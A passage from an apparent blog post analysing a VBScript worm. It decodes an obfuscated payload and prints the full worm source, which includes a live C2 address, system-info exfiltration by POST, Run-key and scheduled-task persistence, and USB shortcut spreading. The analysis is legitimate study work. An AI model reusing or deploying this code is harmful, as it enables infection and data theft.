ݝܛݣݡݤݔۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟܕݦݝܘݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟܕݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓݘݕۼ۹ݕݞݡݔݐݒݗݕݘݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘݣݗݔݝۼ۹ݘݕݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘܫܭܑݛݝݚܑݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕݤݒݐݢݔܗݕݘܝݝݐݜݔܘܫܭݤݒݐݢݔܗݦݝܘݣݗݔݝۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕܑܝܑܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܕݒܘܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡݔݐݒݗݕݞݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݕݞܝݝݐݜݔܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣݔݧݟݛݞݡݔݡܑܕݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺݢݞݕݣݦݐݡݔݒݛݐݢݢݔݢݕݞݛݓݔݡܑܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗܬݒݗݡݦܗܢܣܘۼ۹ݒܬݒݗݡݦܗܨܡܘۼ۹ݕݤܬݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘܕܑܼݘݒݡݞݢݞݕݣܝܴܽ݃ܵݡݐݜݔݦݞݡݚݥܡܝܟܝܤܟܦܡܦݥݑݒܝݔݧݔܑܘݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓݘݕۼ۹ۼ۹݄ܬݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ݄ܬܑܑݣݗݔݝۼ۹ݘݕݜݘݓܗݕݤܛܡܘܬܑܩܑܕݦݝݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣݒݐݢݔݢܗܟܘۼ۹ݒݐݢݔܑݔݧݒܑۼ۹ݢݐܬݢܗܠܘۼ۹ݔݧݔݒݤݣݔݢݐۼ۹ݒݐݢݔܑ݂ݒܑۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡܛܥۼ۹ݒݐݢݔܑܑ݁ܵۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡۼ۹ݒݐݢݔܑ݁ݔݝܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕܬݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕܬݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔܑ݄ݟܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘܬݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝܑݦݢݒݡݘݟݣܝݔݧݔܞܞܑܱܕݒݗܕݕݤܕݒݗܛܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔܑܲݛܑۼ۹݆ܝݠݤݘݣۼ۹ݒݐݢݔܑ݄ݝܑۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ"
var3 = 0
var2 = ""
while var3 != len(var1):
var3 += 1
var2 = var2 + chr(ord(mid(var1, var3, 1)) - var6 + len(var5))
print(var2)
At the end of it, instead of executing the code line by line as it does with it Wscript.echo function from the malware, I printed the result. It gave me an entire executed Visual Basic code :
' Coded by v_B01 On Error Resume Next j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP") g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\") y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct") Function go(m) If m=4 Then T="winmgmts:\\localhost\root\securitycenter" Set B=GetObject(y(3)).InstancesOf(y(4)) For Each a in b go=a.displayName Exit For Next Set B=GetObject(y(3) & "2").InstancesOf(y(4)) For Each a in b go=a.displayName Exit For Next If go="" Then go="Not-found" Else Set B=GetObject(y(0)).InstancesOf(y(m)) For Each a in b If m = 1 Then go=a.volumeserialnumber ElseIf m = 2 Then go=a.caption End If Exit For Next End If End Function Set w = WScript Set sh = Cr(0) Set fs = Cr(1) Function Cr(N) Set Cr = CreateObject(j(N)) End Function Function Ex(s) Ex = sh.ExpandEnvironmentStrings("%"&s&"%") End Function Function Pt(C,A) Pt="" Set X=Cr(3) X.Open "POST","http://houstriko.dynu.net:7754/"&C,false X.setrequestheader "User-Agent:",nf X.send A Pt=X.responsetext End Function Function nf() nf="" i=go(1) s=VN & "_" & i nf=nf&s&c s=ex("COMPUTERNAME") nf=nf&s&c s=ex("USERNAME") nf=nf&s&c s=go(2) nf=nf&s&c s=go(4) nf=nf&s&c&c&nt&c&u&c End Function Sub Ns() On Error Resume Next dr=ex("AppData") & C & wn fs.CopyFile fu,dr,true sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false sh.regwrite g(0) & g(3) & "ZTUK0MZ2SU", Ch & dr & Ch, g(5) fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true End Sub dr=ex("AppData") & C & wn Sub spr() On Error Resume Next For Each dr in fs.drives dp=dr.path & c If dr.isready = TRUE Then If dr.drivetype = 1 Then fs.copyfile fu,dp & wn,true If fs.fileexists(dp & wn) Then fs.getfile(dp & wn).attributes=2+4 End If For Each fi in fs.getfolder(dp).files If instr(fi.name,".") Then If lcase(split(fi.name,".") (ubound(split(fi.name,".")))) <>"lnk" Then fi.attributes=2+4 If ucase(fi.name) <> ucase(wn) Then With sh.createshortcut(dp & split(fi.name,".")(0) & ".lnk") .windowstyle = 7 .targetpath = "cmd.exe" .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit" fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6)) If instr(iconlocation,",") = 0 Then .iconlocation = fi.path Else .iconlocation = fic End If .save() End With End If End If End If Next For Each fo in fs.getfolder(dp).subfolders fo.attributes=2+4 With sh.createshortcut(dp & fo.name & ".lnk") .windowstyle=7 .targetpath="cmd.exe" .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit" fic=sh.regread("HKLM\software\classes\folder" & g(6)) If instr(.iconlocation,",")=0 Then .iconlocation=fo.path Else .iconlocation=fic End If .save() End With Next End If End If Next err.clear End Sub vn="Windows" U="" ch = chrw(34) c = chrw(92) fu = w.scriptfullname wn=w.scriptname NT="No" If fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") Then NT="Yes" End If U= sh.regread(g(2)) If U="" Then If mid(fu,2)=":\" & wn Then U="TRUE" sh.regwrite g(2), U, g(5) Else U="FALSE" sh.regwrite g(2), U, g(5) End If End If Ns spl="|V|" While TRUE f = replace(f,ch&vn&ch,ch&s(1)&ch) Set wr = fs.OpenTextFile(fu,2,false) wr.Write f wr.close() Case "Up" Set wr = fs.OpenTextFile(fu,2,false) s(1) = replace(s(1),"|U|","|V|") wr.Write s(1) wr.Close() sh.run "wscript.exe //B " & ch & fu & ch, 6 w.quit Case "Cl" W.quit Case "Un" S(1) = replace(S(1),"%f",fu) S(1) = replace(S(1),"%n",wn) S(1) = replace(S(1),"%sfdr",dr) execute S(1) w.quit End Select W.Sleep 6000 Spr Wend
From it, I can now notice registries changes happening to victims’ computers, creation of a windows task named Skype that seems to be running a payload from a C2 server called using a POST method with victim’s information as header.
Curious about the origin of the malware, I googled the URL where the POST method is sent and the malware coder’s name that led me to his Twitter, Instagram, YouTube and a bunch of malware analyses from any.run, an interesting website :
What's any.run?
any.run is a really interesting website offering virtual machines to users to hunt and execute malware with no risks. As well, contrary to Virtual Machine’s software, it analysis every changes happening to the victim computer :
I am really happy to have found any.run website as I frequent malware daily. It will allow me to execute, see what happens safely and so gives me new knowledge of its functions.